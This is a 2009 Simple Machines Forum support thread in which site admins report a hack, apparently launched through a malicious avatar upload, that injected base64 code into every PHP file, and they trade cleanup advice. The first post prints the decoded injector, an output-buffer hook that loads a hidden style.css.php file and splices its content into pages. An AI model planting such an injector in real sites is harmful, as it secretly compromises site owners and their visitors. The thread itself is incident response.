News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

Hacked, script injection

Started by vHawkeyev, May 01, 2009, 10:47:02 AM

Previous topic - Next topic

vHawkeyev

All the php files on my site have been injected with Base64-encoded text that translates to

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php')){include_once('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

I had a look at the style.css.php file and it has been encoded multiple times. I finally got it all decoded but I don't know what it all means.

I removed the code from all my pages and deleted the style.css.php but when I went to change my theme in my profile it came up with this page that showed details about my server and a list of directory's as well as all files that had been reinjected with the code above and the style.css.php file reappeared.. I'm stuck, I don't know what to do.

Plz help.

kat

If you don't have any mods installed, just upload fresh files from the SMF install package.

DO NOT OVERWRITE Settings.php

If you have mods, though, that will not be such a good idea.

Of course, you could restore a recent backup, if you have one...

Aleksi "Lex" Kilpinen

Quote from: vHawkeyev on May 01, 2009, 10:47:02 AM
All the php files on my site have been injected with Base64-encoded text that translates to
Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.
Slava
Ukraini!
"Before you allow people access to your forum, especially in an administrative position, you must be aware that that person can seriously damage your forum. Therefore, you should only allow people that you trust, implicitly, to have such access." -Douglas

How you can help SMF

Tyrsson

Quotestyle.css.php
This is not supposed to be a php file. Its a css file...
PM at your own risk, some I answer, if they are interesting, some I ignore.

bsm

I have the exact same problem.

My plan is to remove SMF, the re-build my site from backups.

As for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8

I'll do an admin on the DB and see what (if anything) was uploaded. (Also going to suspend uploads until I've got things cleared up).

What a mess!!!

karlbenson

What version of smf are you using? 1.1.8?
What mods are you using?
Are you using any integrations?

Are you using on that server?
- wordpress
- any software with tinymce editor?

bsm

I'm using 1.1.8, with Ad mod - also TP 0.9.8

Just checked (I have an identical install that I use for testing) avatars - both the same. So, it wasn't an avatar.

There's no other SW on the domain in question.

vHawkeyev

Yes I do have the member krisbarteo

It doesn't seem as if he has uploaded an avatar but when I had a look in my attachments folder I found his avatar, I then downloaded it and opened it in notepad and I found php code. I use the attachments folder for storing avatars.

I have deleted everything to do with krisbarteo and added his IP to my server blacklist.

Mods Installed:
Updated Registration Agreement
The Rules

Kindred

What version of SMF were you running? 
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

vHawkeyev


bsm

I'm using 1.1.8 as well.

I'm diving in, replacing all PHP scripts with "clean" ones. Probably take me all day.

Once done, I'll have a clean backup of all my scripts so if this happens again I can just FTP the site back to normal.

"phasers on stun - we're going in"

sprntrcr

Using 1.1.8

I had the same issue and timestamps showed that it all started minutes after user krisbarteo joined the forum.

I banned him and removed his avatar file. I diffed against a backup and removed the base64 crap from about 50 files.   Also check Themes/default/images/bbc   That is where a bunch of advertising for casinos was stashed.

It appears the avatar that was uploaded was an injection script, so I have disabled uploading of avatars until this issue is resolved.

Google "krisbarteo"  and see all the SMF forums he is a member of.   This is/could get real nasty.

Aleksi "Lex" Kilpinen

What other scripts are you running along SMF?
Slava
Ukraini!
"Before you allow people access to your forum, especially in an administrative position, you must be aware that that person can seriously damage your forum. Therefore, you should only allow people that you trust, implicitly, to have such access." -Douglas

How you can help SMF

vHawkeyev

I managed to get rid of the script injections by deleteing krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then uploaded clean versions of all php files.

But now I'm having troubles with my themes.

bsm

The script injection will affect ALL your php scripts, including themes.

I'm about halfway through manually removing them all before the big upload.

oy vey... what a mess ! :'(

vHawkeyev

QuoteI managed to get rid of the script injections by deleteing krisbarteo's profile and avatar, which had some php code in it that must have been used for the injection. Then uploaded clean versions of all php files.

Like you said it affects all php file so I replaced every one.

Agent Orange

#16
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

Quote from: Kat on May 01, 2009, 12:50:54 PMDO NOT OVERWRITE Settings.php

What happens if you do that?

Never mind, I guess I got lucky first time around, as I didn't have a copy of that particular file (and as such, didn't overwrite it).

JBlaze

Quote from: Agent Orange on May 04, 2009, 04:44:33 PM
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

Quote from: Kat on May 01, 2009, 12:50:54 PMDO NOT OVERWRITE Settings.php

I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool What is repair_settings.php?
Jason Clemons
Former Team Member 2009 - 2012

H

Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain
-H
Former Support Team Lead
                              I recommend:
Namecheap (domains)
Fastmail (e-mail)
Linode (VPS)
                             

JBlaze

Quote from: H on May 04, 2009, 05:03:20 PM
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain

Also, to elaborate on that, there was a recent hack I had to "sanitize" that the hacker had injected extra php files into almost every directory. Make sure that there are no randomly named files and also check your .htaccess for extra code as well.

On another note, check your index.php in the forum root directory as well as index.template.php in your themes directory for unwanted code.

These are all common places for hackers to inject code.
Jason Clemons
Former Team Member 2009 - 2012

Advertisement: